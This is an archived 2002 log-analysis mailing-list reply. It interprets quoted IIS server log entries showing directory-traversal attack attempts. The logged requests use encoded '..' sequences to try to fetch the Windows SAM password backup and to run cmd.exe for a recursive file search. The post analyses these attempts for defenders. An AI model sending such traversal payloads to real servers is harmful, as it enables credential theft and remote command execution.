On Tue, Jun 11, 2002 at 08:03:12PM +0000, Tina Bird wrote: > Here's what I'm seeing -- anyone have any information on this variant? Haven't seen it, myself, but what I see here worries me: > Jun 10 12:53:39.675 <information deleted> op=GET arg=http://Target > IP/a.asp/..%c1%1c../..%c1%1c../winnt/repair/sam result="404 Object Not > Found" > > Jun 10 12:53:43.578 <information deleted> op=GET arg=http://Target > IP/a.asp/..%c1%9c../..%c1%9c../winnt/repair/sam result="404 Object Not > Found" These seem pretty straightforward--attempts to get the backup copy of the SAM file (the windows equiv of /etc/shadow). > Jun 10 12:53:37.845 <information deleted> op=GET arg=http://Target > IP/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c: > \\*.cif/s/b result="500 Server Error" This is the one that scares me; it's attempting to run a recursive directory search on your C drive to find your Internet Explorer component information file--the file that, for example, Windows Update uses to determine what patches you have installed. Presumably, if that request succeeded, it would then download the CIF to find out what version of IE you have, etc., and try only those exploits of relevance. It looks like the script kiddies are getting smarter... -- Sweth. -- Sweth Chandramouli Idiopathic Systems Consulting svcat_private http://www.idiopathic.net/ --------------------------------------------------------------------- To unsubscribe, e-mail: loganalysis-unsubscribeat_private For additional commands, e-mail: loganalysis-helpat_private
This archive was generated by hypermail 2b30 : Tue Jun 11 2002 - 16:45:44 PDT